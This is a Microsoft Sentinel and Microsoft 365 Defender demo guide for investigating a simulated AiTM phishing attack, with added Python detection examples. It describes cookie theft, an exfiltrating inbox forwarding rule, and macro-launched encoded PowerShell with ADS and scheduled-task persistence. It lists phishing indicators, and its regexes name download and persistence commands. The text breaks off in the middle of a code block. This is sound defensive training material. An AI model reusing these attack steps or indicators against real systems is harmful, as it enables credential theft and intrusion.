SIEM&XDR Demo Guide v1.2 February2023

This demo shows how to investigate a phishing attack where an attacker impersonated a coworker to steal credentials and access a user's Microsoft 365 and Azure accounts. The investigation is conducted across Microsoft Sentinel and Microsoft 365 Defender, allowing security teams to triage incidents, investigate alerts, and correlate data to fully resolve the incident. Key steps include triaging the initial incident in Sentinel, investigating related attacks in Microsoft 365 Defender, completing analysis in Sentinel, and ultimately resolving the incident. The demo highlights the integration and joint capabilities of Sentinel and Microsoft 365 Defender to effectively investigate and respond to security incidents.

Uploaded by

Zied BERRIMA
Microsoft Sentinel (SIEM) and

Microsoft 365 Defender (XDR)


Demo Guide

Updated: February 2023, Version 1.2


Check for updated versions here
This document is provided “as-is”. Information and views expressed in this document, including URL and other
Internet Web site references, may change without notice. You bear the risk of using it.

This document does not provide you with any legal rights to any intellectual property in any Microsoft product.
You may copy and use this document for your internal reference purposes.
Table of Contents
Table of Contents  2
What’s New  3
Demo Instructions  4
  How to enable and access the XDR & Sentinel Demo  4
  How to find relevant Demo scenarios  4
  How to use this demo  4
Microsoft 365 Defender (XDR) & Microsoft Sentinel Integration  5
  Security Operations Demo Deep Dive  6
    Attack Story – AiTM Phishing  6
    Demo Delivery  8
    Step 1: Triage incident in Microsoft Sentinel  9
    Step 2: Investigate attack in Microsoft 365 Defender  12
    Step 3: Complete investigation in Microsoft Sentinel  18
    Step 4: Resolve incident in Microsoft Sentinel  23
Conclusion  24

What’s New
February 2023
- Updated instructions to access the environment for Microsoft employees
- New attack story: AiTM Phishing
November 2022
- Microsoft 365 Defender & Microsoft Sentinel SecOps demo

Demo Instructions
How to enable and access the XDR & Sentinel Demo
Tenant: ContosoHotels (seccxpninja.onmicrosoft.com)

Microsoft Internal: Using your Microsoft account, request access from https://aka.ms/M365dDemoAccess to
access the tenant through our B2B connection. This will allow you to access all the features of this demo. Once
your request has been automatically approved (within seconds), make sure you switch the Directory / Tenant
from Microsoft to contosohotels as shown on the screenshot below. If you don’t see it, sign out from the Azure
portal and log in again. If you need our help, you can contact us at the bottom of this page.

Partners: Credentials will be provided through the CDX experience card. These credentials will change daily at
6:00 am UTC. To obtain the daily password to enable you to access the shared demo environment, please do
the following:

1. Open the Microsoft Sentinel & Microsoft 365 Defender (SIEM & XDR)
2. Enter and select a customer in the customer field
3. Click Add
4. Click Start
5. Accept the Terms of Use by checking the box and click Accept and Continue
6. Click on Launch after it appears and click Accept and Continue again
7. A new window containing login credentials will open on the right side of your screen

If you are logged in with credentials when the new daily password is generated, your session will not be
terminated. However, if your session times out after the password is changed, you will need to obtain the new
daily password to log in again.

How to find relevant Demo scenarios


This environment is a live environment shared by multiple Product Groups and teams, and it is used by many
people like you to demonstrate our products’ capabilities. This results in a lot of noise in the incident list
(impossible travel, custom detections, etc.) that we try to reduce as much as possible, but we don’t want a
sanitized environment either.

To help you to find a relevant demo, you can:


- Use our demo guides (yes, one like this)
- Filter the incident list with incident tags such as “SIEM&XDR Demo”, “MDI Demo”, “MDO Demo”, “MDE Demo”,
“M365D Demo”, “MDA Demo”, etc. Note that each demo incident is tagged with the product name and
the demo scenario it belongs to, for example “MDO Demo” + “BEC” or “MDE Demo” + “Unmanaged”.

We have given you rights to perform actions in the environment so that you can show your customers a more
complete experience. Please revert any changes you make, and do not interfere with “DoNotTouch” entities.

How to use this demo


The demo is delivered through a demo tenant where simulated attacks are run so the demonstration can be
delivered many times with minimal effort. This is a dynamic demo environment that will change over time,
and you should visit the CDX Experience card at to check for updated demo scripts before each demo you
perform. This will ensure you have the latest demo guide and will not run into any problems during the
customer demo session.

Microsoft 365 Defender (XDR) & Microsoft Sentinel Integration
Microsoft Sentinel's Microsoft 365 Defender incident integration allows you to stream all Microsoft 365
Defender incidents into Microsoft Sentinel and keep them synchronized between both portals. Incidents from
Microsoft 365 Defender include all associated alerts, entities, and relevant information, providing you with
enough context to perform triage and preliminary investigation in Microsoft Sentinel. Once in Sentinel,
incidents will remain bi-directionally synced with Microsoft 365 Defender, allowing you to take advantage of
the benefits of both portals in your incident investigation. More information on M365 Defender integration
with Sentinel is available on this link: Microsoft 365 Defender integration with Microsoft Sentinel | Microsoft
Learn

This integration gives Microsoft 365 security incidents the visibility to be managed from within Microsoft
Sentinel, as part of the primary incident queue across the entire organization, so you can see – and correlate –
Microsoft 365 incidents together with those from all your other clouds, third-party services or applications and
on-premises systems. At the same time, it allows you to take advantage of the unique strengths and
capabilities of Microsoft 365 Defender for in-depth investigations and a Microsoft 365-specific experience
across the Microsoft 365 ecosystem. Microsoft 365 Defender enriches and groups alerts from multiple
Microsoft 365 products, both reducing the size of the SOC’s incident queue and shortening the time to resolve.
The component services that are part of the Microsoft 365 Defender stack are:

- Microsoft Defender for Endpoint (formerly Microsoft Defender ATP)
- Microsoft Defender for Identity (formerly Azure ATP)
- Microsoft Defender for Office 365 (formerly Office 365 ATP)
- Microsoft Defender for Cloud Apps (formerly Microsoft Cloud App Security)

Other services whose alerts are collected by Microsoft 365 Defender include:

- Microsoft Purview Data Loss Prevention (DLP) (Learn more)
- Azure Active Directory Identity Protection (AADIP) (Learn more)

Security Operations Demo Deep Dive
Attack Story – AiTM Phishing
This demo story is based on the AiTM (Adversary in The Middle) phishing attack.
Find more about this attack in the Microsoft Security Blog.

AiTM Phishing attack

Polly Watkins is working as a cloud architect in the Azure Infrastructure department when she receives and
opens a spear-phishing email from someone impersonating a co-worker. She clicks on the link in the
email on Workstation 8, which redirects to the attacker’s proxy that impersonates the Microsoft login page
(login.microsoftonline.com). After Polly enters her credentials and successfully authenticates via MFA, the
attacker obtains the session cookie (ESTSAUTH) and successfully authenticates to a session on the user’s behalf
to both the Office 365 & Azure Portal from a Tor IP address. In the Office 365 portal, the attacker creates a
forwarding rule in Polly’s inbox to exfiltrate her email messages. In the Azure Portal, the attacker leverages
Polly’s privileged permissions on a specific resource group to create a new Azure storage container and
uploads a weaponized Microsoft Word document. The attacker generates a URL to the document with a
Shared Access Signature (SAS) key and sends an internal phishing email to Karla Dickens, working in the Sales
Department. Karla receives and opens the email and clicks on the link to download the document on
Workstation 6. The document contains a malicious macro that executes a PowerShell script to create a
backdoor via the task scheduler.

Attack Steps
Step  Details
1     Phishing email sent (link is safe) to Dan and Polly; link is weaponized
2     Polly clicks on the link
3     Polly’s ESTSAUTH cookies stolen
4     Polly’s ESTSAUTH cookies imported into a session
5     The attacker creates an inbox forwarding rule in Polly’s email account in Office 365
6     The attacker creates a new container in an Azure Storage account in the Azure Portal; the attacker uploads a malicious file to the container and generates a URL with a SAS key
7     The attacker (as Polly) sends an internal phishing email to Karla including a link to the file
8     Karla clicks on the link, downloads the file, and executes the payload
9     Backdoor created on the endpoint via task scheduler

Demo Delivery
Log in to the Microsoft Sentinel portal with the following credentials

- Microsoft Internal: Microsoft Account (Switch directory to ContosoHotels)


- Partners: In an InPrivate browser session using the credentials found in the credential window.

After you have signed into the portal, you can stage the correct incident list view by performing the following
steps:

1. In the left navigation pane, click Incidents
2. Filter the time range to Last 30 days
3. To search for the demo incident, you can filter using either of the options below:
   a. Search by Incident Name: SIEM&XDR
   b. Search by Owner: SecurityDemoT1

Step 1: Triage incident in Microsoft Sentinel
In this demo we will conduct a blue team exercise, deep diving into every step taken in the AiTM phishing
attack, to fully narrate the attack story.

Important: Entity information highlighted (e.g. URLs, email subject, Azure storage container name, IP address) is
subject to change on every attack execution.

Demo Script

Microsoft Sentinel can integrate with Microsoft 365 Defender in various ways:
- Synchronize Microsoft 365 Defender incidents, including all alerts and entities
- Bi-directional sync of incident status, owner, and closing reason
- Enrich Microsoft 365 Defender incidents with insights from Microsoft Sentinel
- In-context deep link to facilitate investigations across both portals

Let’s start our investigation in Microsoft Sentinel.

From the incident page, search for the relevant Microsoft 365 Defender incident, and view the full details.

Instructions
1. Access the Microsoft Sentinel portal
   Note: Use the link above, as it enables the necessary preview features
2. Click on Incidents, and find the relevant incident SIEM&XDR Demo <latest date> Multi-stage incident …
   a. Search by Incident Name: SIEM&XDR Demo
   or
   b. Search by Owner: SecurityDemoT1
3. Click View full details in the bottom right corner of the page

Demo Script

This incident is composed of alerts from the whole Microsoft 365 Defender stack, and the alerts cover all the
MITRE categories.

Investigation insights
- Multistage targeted attack may have occurred

From the Entities list, we can see that Microsoft Azure is part of this incident, which needs to be investigated.

Top insights in the right pane provides great insights for the entities of an incident, including VIP information
from a watchlist, IP reputation, anomalies seen for an account, etc.

In the Activity Log, the output results of the following playbooks are included:
- IP reputation: Get the VirusTotal IP reputation of all external IPs associated with the incident, and the
  geolocation of each IP. Reputation is the IP’s score calculated from the votes of the VirusTotal community.
- User Account Risk Details: Get risk details from the IdentityInfo table of all users associated with the incident
- Threat Indicators related to user
- Endpoint Health Status: Get the endpoint security configuration status from Microsoft Defender Vulnerability
  Management of all devices associated with the incident

From the results, we understand that there are malicious IPs, high-risk users and misconfigured, vulnerable
devices involved.

At this point, the Tier-1 SOC analyst has found enough evidence to conclude a true positive and escalates the
incident to Tier-2 for further investigation.

Investigation insights
- Misconfigured device: Workstation6 (Real-time Protection & Cloud Protection are turned OFF)
- VIP User: adm_pwatkins (*as Polly has high privileges, she was added to the VIP watchlist)
- Users at risk:
  - Karla: High risk, Confirmed Compromised
  - Polly (admin): Medium risk, At Risk
- Multiple malicious URLs / IPs are related to adm_pwatkins
- Multiple IP addresses with reputation under 0 in VirusTotal > malicious indication
- Microsoft Azure is part of the incident and needs to be investigated

As there are high risks for users Polly and Karla, let’s take the steps to block both user accounts in Azure AD.

Instructions
4. Navigate to the Entities, scroll down to find Microsoft Azure, but do not click on it
5. In the Entities, search for adm_pwatkins and navigate to the Top Insights on the right of the page
6. Expand the insights below:
   - Watchlist Insights (Preview) for adm_pwatkins
7. Click on Activity log on the top left (under the incident name “SIEM&XDR Demo mm-dd-yy”)
8. Navigate to the results of each playbook:
   a. Virus Total IP Reputation
   b. User Account Risk Details
   c. Endpoint Health Status

Playbook: Block Compromised User (Entity Trigger)

Playbook SIEMXDR-Block-AzureADUser-Entity will block the user in Azure Active Directory and output the
result in the Activity Log.

Note
- Playbook: “Incident Trigger”
- The playbook will re-enable the user right after execution, for demo continuity

Important steps to execute SIEMXDR-Block-AzureADUser-Entity
1. In the Microsoft Sentinel incident page, find user Polly Watkins (admin),
   adm_pwatkins@seccxpninja.onmicrosoft.com, under Entities
2. Click on the ellipsis icon next to the entity, and click Run playbook
3. A right pane with the list of playbooks will be shown. Search for playbook SIEMXDR-Block-AzureADUser-Entity
4. Scroll to the very right, and click on Run to execute the playbook
5. Close the “Run playbook on account” pane
6. Open Activity log on the top left (under the incident name “SIEM&XDR Demo mm-dd-yy”), and point out the
   new comment with the result of this playbook
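The Tier-1 decision described above (malicious IPs, risky users and a misconfigured device together make a true positive) can be written down as a small scoring routine. The Python below is an added example for readers of this guide; it is not part of the demo tenant or of any Sentinel playbook. The enrichment dictionaries are constructed to resemble the Activity Log comments the guide's playbooks write (VirusTotal reputation, IdentityInfo risk, Defender Vulnerability Management configuration) and the VIP watchlist; the "two independent indicator families" threshold and all function names are assumptions.

```python
"""Tier-1 triage from playbook enrichment results (added example, not the demo's code).

The dictionaries below are constructed sample data shaped like the Activity Log
comments written by the guide's enrichment playbooks and the VIP watchlist.
"""
from dataclasses import dataclass, field

# Constructed: VirusTotal community reputation per external IP (negative = community votes malicious)
IP_REPUTATION = {
    "23.137.251.61": {"reputation": -12, "country": "NL"},
    "20.127.144.13": {"reputation": -4, "country": "US"},
    "40.126.1.1": {"reputation": 3, "country": "US"},
}

# Constructed: IdentityInfo-style risk details per user (keys lower-cased)
USER_RISK = {
    "kdickens@seccxp.ninja": {"risk_level": "high", "risk_state": "confirmedCompromised"},
    "adm_pwatkins@seccxpninja.onmicrosoft.com": {"risk_level": "medium", "risk_state": "atRisk"},
}

# Constructed: Defender Vulnerability Management configuration status per device
ENDPOINT_HEALTH = {
    "workstation6": {"realtime_protection": False, "cloud_protection": False},
    "workstation8": {"realtime_protection": True, "cloud_protection": True},
}

# Constructed: VIP watchlist (high-privilege accounts)
VIP_WATCHLIST = {"adm_pwatkins@seccxpninja.onmicrosoft.com"}


@dataclass
class TriageResult:
    findings: list = field(default_factory=list)   # human-readable evidence lines
    categories: set = field(default_factory=set)   # independent indicator families hit
    escalate: bool = False                         # True -> hand over to Tier-2


def triage(entities: dict) -> TriageResult:
    """Evaluate an incident's entities (ips / accounts / hosts) against the enrichment data.

    Assumed rule: the incident is a true positive worth escalating when at least two
    independent indicator families (malicious IP, risky user, vulnerable device) agree.
    """
    r = TriageResult()
    for ip in entities.get("ips", []):
        rep = IP_REPUTATION.get(ip)
        if rep and rep["reputation"] < 0:
            r.findings.append(f"malicious IP {ip} (VirusTotal reputation {rep['reputation']}, {rep['country']})")
            r.categories.add("malicious_ip")
    for account in entities.get("accounts", []):
        key = account.lower()
        risk = USER_RISK.get(key)
        if risk and risk["risk_level"] in ("medium", "high"):
            r.findings.append(f"user at risk: {account} ({risk['risk_level']}, {risk['risk_state']})")
            r.categories.add("risky_user")
        if key in VIP_WATCHLIST:
            # VIP membership is context for prioritisation, not evidence by itself: no category
            r.findings.append(f"VIP user involved: {account}")
    for host in entities.get("hosts", []):
        health = ENDPOINT_HEALTH.get(host.lower())
        if health and not (health["realtime_protection"] and health["cloud_protection"]):
            r.findings.append(f"misconfigured device: {host} (real-time or cloud protection OFF)")
            r.categories.add("vulnerable_device")
    r.escalate = len(r.categories) >= 2
    return r


if __name__ == "__main__":
    demo = triage({
        "ips": ["23.137.251.61", "20.127.144.13", "40.126.1.1"],
        "accounts": ["adm_pwatkins@seccxpninja.onmicrosoft.com", "KDickens@seccxp.ninja"],
        "hosts": ["Workstation6", "Workstation8"],
    })
    for line in demo.findings:
        print("-", line)
    print("escalate to Tier-2:", demo.escalate)
```

Run as a script it prints the evidence lines for the demo incident's entities and the escalation decision; VIP membership is deliberately kept out of the score so that a privileged user alone never produces a true positive.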

Step 2: Investigate attack in Microsoft 365 Defender

Demo Script

Now that we understand the broad view of this incident and the risky entities in Sentinel, we will investigate
in the Microsoft 365 Defender portal to understand more details.

You will land on the Attack story page of the investigated incident in the Microsoft 365 Defender portal.

Let’s investigate the alert Suspicious URL clicked.

In the alert story, we can see that Polly (on Workstation8) has opened outlook.exe and clicked on the link,
which is categorized as MITRE technique T1204.001: Malicious Link.

This alert is related to another alert, A potentially malicious URL click was detected. In the details, we
understand that there is an email sent from an external user to Polly which contained the exact same URL that
was determined to be malicious.

Investigation insights (Attack Step 1)
Polly received an email, and clicked on a malicious link
Email Info
- Sender: SBeavers1@proton.me
- Recipient: pwatkins@seccxp.ninja
- Subject: New Azure Firewall
- URL: http[:]//gbnplqxxxxxxxxxxx.companyportal.cloud/
*Highlighted entities are subject to change for every attack execution

Instructions
1. Click on the Investigate in Microsoft 365 Defender link on the left of the page
2. From the attack story, click on the Suspicious URL clicked alert
3. Navigate to the alert story (bottom pane), and point out the outlook.exe process details
4. From the attack story, click on the A potentially malicious URL click was detected alert related to
   pwatkins@seccxp.ninja
5. Click on the Message list row (bottom pane, as in the screenshot below) to see the alert details (right pane)
6. Scroll down on the alert details and indicate the sender, recipient, subject, and URL of this email

Demo Script

In the email entity page, we see that the same email was delivered to another user.

In the URL details, we see that the URL has a known phish verdict and redirects to a different URL. A screenshot
of this URL shows that it is a Microsoft login page, so we understand that the attacker had set up a reverse
proxy.

In addition, the alert Potential phishing web site indicates that the redirected URL is a potential phishing web
site.

Investigation insights (Attack Step 2)
Confirmed that Polly has received a phishing email
URL Info
- http[:]//gbnplqxxxxxxxxxxx.companyportal.cloud/
- Verdict: Phish (MSTIC / ML)
- Redirects to https[:]//login.antoinetest.ovhxxxx
- Microsoft login page (reverse proxy)
- Potential phishing website
- 20.127.144.13
*Highlighted entities are subject to change for every attack execution

Let’s also look at the automatic investigation results of this incident. We can see that the email & URL
analyzed are considered malicious/suspicious.

Investigation insights (Attack Step 2)
Confirmed that the email received is malicious
- Sender: SBeavers1@proton.me
- Subject: New Azure Firewall
- URL: http[:]//gbnplqxxxxxxxxxxx.companyportal.cloud/
*Highlighted entities are subject to change for every attack execution

Instructions
7. Click on Open email entity from the alert details
8. Click on the URL tab, and then the link associated with this email, which will show more information
   NOTE: DO NOT access this link, as it’s a phishing site
9. Navigate to the URL details on the right pane and point out the verdict and verdict reason
10. Click on the link under Screenshots to see the screenshot of this URL
11. Go back to the Incident page, and click on the Evidence and Response tab
12. In the Emails and URLs blades, point to the verdict showing that both the email & URL we have
    investigated are Malicious/Suspicious

Demo Script

Going back to the attack story, after the suspicious link was clicked, there are many alerts from Azure AD
Identity Protection & Microsoft Defender for Cloud Apps:
- Anonymous IP address
- Activity from infrequent country
- Activity from a Tor IP address

If you pin all the alerts above, you will see that suspicious sign-ins coming from different IPs are related to
the adm_pwatkins account.

When drilling down into either alert below, related to the Microsoft Exchange Online or Office 365 entity, we
can see the details of the logon activity of this user:
- Activity from a Tor IP address
- Activity from a password-spray associated IP address
- Activity from an anonymous proxy

From the details we have found out that Polly has successfully authenticated via MFA from suspicious IP
addresses.

Investigation insights (Attack Steps 3, 4)
Successful access from Tor (Anonymous) IP, using MFA, to Azure Portal
Polly’s account is likely to be compromised
- MFA Status: MfaFromCredential
- UPN: adm_pwatkins@seccxpninja.onmicrosoft.com
- Application name: Exchange Online / Office 365

After access we can see that a forwarding rule to send bank/credential related emails to an external user was
created, which generated the alert Suspicious inbox forwarding rule.

Investigation insights (Attack Step 5)
Email containing bank/credential info forwarded to external user
- Rule name: itcleanup
- Subject or Body Contains: iban; secret; password; transfer; bank; account
- Forward to: lomelahimom@jollyfree.com
*Highlighted entities are subject to change for every attack execution

Instructions
13. Go back to the Incident page (Attack Story)
14. Point out all the anomalous access alerts, including the following:
    a. Anonymous IP address
    b. Activity from infrequent country
    c. Activity from a Tor IP address
15. Pin all the alerts above
16. Indicate that all the suspicious access is related to the adm_pwatkins account
17. Click on Activity from a Tor IP address, or Activity from a password-spray associated IP address, or
    Activity from an anonymous proxy, related to the Microsoft Exchange Online or Office 365 entity
18. Click on the Activity Log in the alert story (bottom pane)
19. Scroll down in the Event Details (right pane)
20. Point out the login details, showing that this user has logged on successfully via MFA
21. Click on the Suspicious inbox forwarding rule alert, related to Exchange Online
22. Click on the activity (bottom pane) that starts with Create forwarding Inbox rule:
23. Click on View raw data in the Event details (right pane)
24. Point out the JSON with the forwarding rule details
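Attack step 5 is what the Suspicious inbox forwarding rule alert catches: a rule that forwards mail to an address outside the organization, filtered on financial and credential keywords. The Python below is an added example, not the demo's code and not Microsoft's detection logic. It scans constructed audit records shaped like Exchange Online entries for New-InboxRule, Set-InboxRule and Set-Mailbox, flags any forwarding target whose domain is not in the organization, and raises the severity when the rule's keyword filter targets terms such as the ones in the itcleanup rule. The sample records, the internal-domain set, the keyword list and the severity ladder are all assumptions.

```python
"""Detect inbox rules that forward mail outside the organization (added example).

The audit records below are constructed to resemble Exchange Online audit entries for
New-InboxRule / Set-InboxRule / Set-Mailbox; they are not real log data.
"""
import json

# Assumed organization domains; anything else counts as external
INTERNAL_DOMAINS = {"seccxp.ninja", "seccxpninja.onmicrosoft.com"}
# Cmdlet parameters that send a copy of mail somewhere else
FORWARD_PARAMS = ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo", "ForwardingSmtpAddress")
# Keyword filters typical of financial / credential theft rules (assumed list)
SENSITIVE_WORDS = {"iban", "secret", "password", "transfer", "bank", "account", "invoice", "payment"}

SAMPLE_AUDIT_LOG = [  # constructed
    json.dumps({"Operation": "New-InboxRule", "UserId": "adm_pwatkins@seccxpninja.onmicrosoft.com",
                "ClientIP": "23.137.251.61",
                "Parameters": [{"Name": "Name", "Value": "itcleanup"},
                               {"Name": "ForwardTo", "Value": "lomelahimom@jollyfree.com"},
                               {"Name": "SubjectOrBodyContainsWords",
                                "Value": "iban;secret;password;transfer;bank;account"},
                               {"Name": "DeleteMessage", "Value": "True"}]}),
    json.dumps({"Operation": "New-InboxRule", "UserId": "kdickens@seccxp.ninja", "ClientIP": "10.1.2.3",
                "Parameters": [{"Name": "Name", "Value": "to manager"},
                               {"Name": "ForwardTo", "Value": "manager@seccxp.ninja"},
                               {"Name": "From", "Value": "vendor@example.com"}]}),
    json.dumps({"Operation": "Set-InboxRule", "UserId": "kdickens@seccxp.ninja", "ClientIP": "10.1.2.3",
                "Parameters": [{"Name": "Identity", "Value": "to manager"},
                               {"Name": "MoveToFolder", "Value": "Vendors"}]}),
    json.dumps({"Operation": "Set-Mailbox", "UserId": "adm_pwatkins@seccxpninja.onmicrosoft.com",
                "ClientIP": "23.137.251.61",
                "Parameters": [{"Name": "Identity", "Value": "adm_pwatkins"},
                               {"Name": "ForwardingSmtpAddress", "Value": "smtp:lomelahimom@jollyfree.com"}]}),
]


def _bare_address(value: str) -> str:
    """Normalize 'smtp:user@x', '[SMTP:user@x]' or plain 'user@x' to 'user@x'."""
    v = value.strip().strip("[]")
    if ":" in v and "@" in v.split(":", 1)[1]:
        v = v.split(":", 1)[1]
    return v.strip().lower()


def _split_list(value: str) -> list:
    return [p.strip() for p in value.split(";") if p.strip()]


def analyze_inbox_rule(record: dict):
    """Return a finding dict for an external-forwarding rule, or None if the record is benign."""
    if record.get("Operation") not in ("New-InboxRule", "Set-InboxRule", "Set-Mailbox"):
        return None
    params = {p["Name"]: p["Value"] for p in record.get("Parameters", [])}
    targets = []
    for name in FORWARD_PARAMS:
        if name in params:
            targets.extend(_bare_address(t) for t in _split_list(params[name]))
    external = [t for t in targets if "@" in t and t.rsplit("@", 1)[1] not in INTERNAL_DOMAINS]
    if not external:
        return None
    words = set()
    for name in ("SubjectOrBodyContainsWords", "SubjectContainsWords", "BodyContainsWords"):
        if name in params:
            words.update(w.lower() for w in _split_list(params[name]))
    keywords = sorted(words & SENSITIVE_WORDS)
    if record["Operation"] == "Set-Mailbox":
        rule = "mailbox-level forwarding"
    else:
        rule = params.get("Name") or params.get("Identity") or "<unnamed>"
    return {
        "user": record["UserId"],
        "client_ip": record.get("ClientIP"),
        "rule": rule,
        "forward_to": external,
        "keywords": keywords,
        "deletes_original": params.get("DeleteMessage", "False").lower() == "true",
        # Assumed severity: external forwarding alone is medium; keyword-targeted theft is high
        "severity": "high" if keywords else "medium",
    }


def scan_audit_log(lines: list) -> list:
    """Parse JSON audit lines and return all external-forwarding findings."""
    findings = []
    for line in lines:
        finding = analyze_inbox_rule(json.loads(line))
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_audit_log(SAMPLE_AUDIT_LOG):
        print(f["severity"].upper(), f["user"], f["rule"], "->", ", ".join(f["forward_to"]), f["keywords"])
```

Mailbox-level forwarding (Set-Mailbox with ForwardingSmtpAddress) is checked alongside inbox rules because it reaches the same outcome without creating a rule, and a rule that forwards to an internal colleague is deliberately left unreported to keep the signal clean.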

Demo Script

There is another alert, Activity from a Tor IP address, related to the Microsoft Azure entity. We can see that
the attacker logged in to the Azure Storage app and conducted operations to list keys and write containers in
a storage account called contosohotelassets.

Investigation insights (Attack Step 6)
Successful access from Tor IP, using MFA, to Azure Storage
- MFA Status: MfaFromCredential
- UPN: adm_pwatkins@seccxpninja.onmicrosoft.com
- Application name: Microsoft_Azure_Storage
- Operation: ListKeys StorageAccounts (contosohotelassets)
- IP Address: 23.137.251.61 (password-spray associated IP address)
*Highlighted entities are subject to change for every attack execution

Later, we will investigate further in Microsoft Sentinel what exactly happened in the Azure Storage account.

We have been investigating a lot into Polly’s account, as it is highly likely to be compromised, conducting
malicious/suspicious activities in the Office 365 & Microsoft Azure environment.

Instructions
25. Click on the ellipsis on the Microsoft Azure icon, and click on Pin related alerts
26. On the list of alerts on the left, find the alert that was pinned, and click on it to show the alert details
    *This can be any of the Microsoft Defender for Cloud Apps alerts
27. Click on any Log on Activity (bottom pane) and point out the logon details (right pane) to see that MFA has
    been successful
28. Click on the Activity (bottom pane) that starts with ListKeys Storage Accounts:
29. Point out that the ListKeys operation was successful on the storage account contosohotelassets

Demo Script

When scrolling down into the incident attack story, we now see alerts related to new entities: the
workstation6.seccxp.ninja machine and the KDickens@seccxp.ninja account.

Let’s drill down into the Suspicious URL clicked alert for this user and machine.

Looking at the alert story, we can see that user Karla Dickens (Account Manager in Sales) has clicked on a link
from an email (outlook.exe), which downloaded a Word file. This Word file executes a base64-encoded
PowerShell script as a child process, which then downloads additional payloads to generate suspicious
activities on the machine. You can scroll down in the alert story to see all the related alerts caused by this
PowerShell script.

Investigation insights (Attack Step 8)
Karla received an email, clicked on a malicious link, downloaded a Word file and executed it
- URL: https[:]//contosohotelsassets.blob.core.windows.net/automation/generateAccountPlan.doc
- Downloaded File: generate AccountPlan.doc
- Behavior: Word document executes base64-encoded PowerShell script as child process

You can see that the malicious Doc file creates a persistence mechanism by downloading a binary and hiding it
in an NTFS Alternate Data Stream. Remember, ADS are used in Windows to store additional information about
files, like the Mark of the Web, but attackers also use them to hide content.

This file is then launched at every startup, and right now, using a scheduled task.

We can also see that this file is making a network connection to an IP that we have declared as malicious.

Looking into the details of the related alert (either of the below):
- Email messages containing malicious URL removed after delivery
- A potentially malicious URL click was detected
we can see that this email came from an internal compromised user, adm_pwatkins (Polly).

Investigation insights (Attack Step 7)
Karla received an internal phishing email from Polly
- Sender: adm_pwatkins@seccxpninja.onmicrosoft.com
- Subject: Account plan automation
- URL: https://contosohotelsassets.blob.core.windows.net/automation/generateAccountPlan.doc?sp=r&stxxxxx
- Threat: Malware / URL detonation reputation
*Highlighted entities are subject to change for every attack execution

Instructions
30. Scroll down on the Attack story, and click on the Suspicious URL clicked alert related to device
    workstation6 and user KDickens
31. Navigate to the alert story (bottom pane), and point out the outlook.exe process, and that the URL
    contains the storage account contosohotelassets
32. Scroll down and point out that WINWORD.exe (Microsoft Word) is executed to open the file called
    generateAccountPlan.doc
33. Navigate to the second child process of Microsoft Word, where it executes powershell.exe with a
    base64-encoded command
34. Navigate then to the script AMSI data of the executed powershell.exe to clearly see the script content.
    Highlight the fact that the script downloads content that is then written to an Alternate Data Stream
    named admin.exe of a file named itplaceholder.txt, and that this file is then registered to launch with a
    scheduled task at every startup and right now
35. We can see the task running with the subsequent alerts
36. Click on the Email messages containing malicious URL removed after delivery alert
37. Click on the message (bottom pane) to see the email details (right pane). Point out that this email was
    sent from user adm_pwatkins to kdickens, and included a URL that user kdickens clicked to download and
    execute (generateAccountPlan.doc)
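Attack steps 8 and 9 above (Word spawning an encoded PowerShell command that stages a binary in an NTFS Alternate Data Stream and registers a scheduled task) leave a characteristic trail in process events, which is what steps 33 and 34 of the instructions walk through in the portal. The Python below is an added example, not code from this guide or from Microsoft Defender for Endpoint. It decodes the -EncodedCommand payload of constructed DeviceProcessEvents-style records and scores the Office-parent, download, ADS-path and schtasks indicators into a severity. The sample events, the decoy script inside them (built here only to mirror the behaviour the guide describes), the indicator names and the severity ladder are all assumptions.

```python
"""Score Office-spawned script hosts for ADS staging and scheduled-task persistence (added example).

Records are constructed to resemble Defender for Endpoint DeviceProcessEvents rows; the
encoded script inside them is a decoy built here to mirror the behaviour the guide describes.
"""
import base64
import binascii
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# file.ext:stream  (the ':' must follow an extension, which rules out drive letters and URL schemes)
ADS_RE = re.compile(r"(?<![/:])\b[\w.-]+\.[A-Za-z0-9]{1,5}:[\w.$-]+")
SCHTASK_RE = re.compile(r"schtasks(?:\.exe)?\s+/create|Register-ScheduledTask", re.I)
DOWNLOAD_RE = re.compile(r"Invoke-WebRequest|DownloadFile|DownloadString|Net\.WebClient|Start-BitsTransfer", re.I)


def encode_powershell(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if the command line carries none."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lower()
        # PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
        if len(flag) > 1 and flag[0] in "-/" and "encodedcommand".startswith(flag[1:]):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def analyze_process_event(event: dict):
    """Return a finding for a suspicious script-host launch, or None."""
    parent = event.get("InitiatingProcessFileName", "").lower()
    child = event.get("FileName", "").lower()
    if child not in SCRIPT_HOSTS:
        return None
    cmdline = event.get("ProcessCommandLine", "")
    decoded = decode_encoded_command(cmdline)
    text = cmdline + " " + (decoded or "")       # inspect both the raw line and the decoded script
    indicators = []
    if parent in OFFICE_APPS:
        indicators.append("office_parent")
    if decoded is not None:
        indicators.append("encoded_command")
    if DOWNLOAD_RE.search(text):
        indicators.append("network_download")
    ads_targets = sorted(set(ADS_RE.findall(text)))
    if ads_targets:
        indicators.append("ads_path")
    if SCHTASK_RE.search(text):
        indicators.append("scheduled_task")
    if not indicators:
        return None
    # Assumed severity ladder: persistence or ADS staging is high; encoded code from an
    # Office parent or combined with a download is medium; a single weak indicator is low.
    if "ads_path" in indicators or "scheduled_task" in indicators:
        severity = "high"
    elif "encoded_command" in indicators and ("office_parent" in indicators or "network_download" in indicators):
        severity = "medium"
    else:
        severity = "low"
    return {"device": event.get("DeviceName"), "parent": parent, "child": child,
            "indicators": indicators, "ads_targets": ads_targets, "decoded": decoded, "severity": severity}


def scan_process_events(events: list) -> list:
    return [f for f in (analyze_process_event(e) for e in events) if f]


# Constructed decoy script: download, write into an ADS, register a startup task and run it now
SAMPLE_SCRIPT = (
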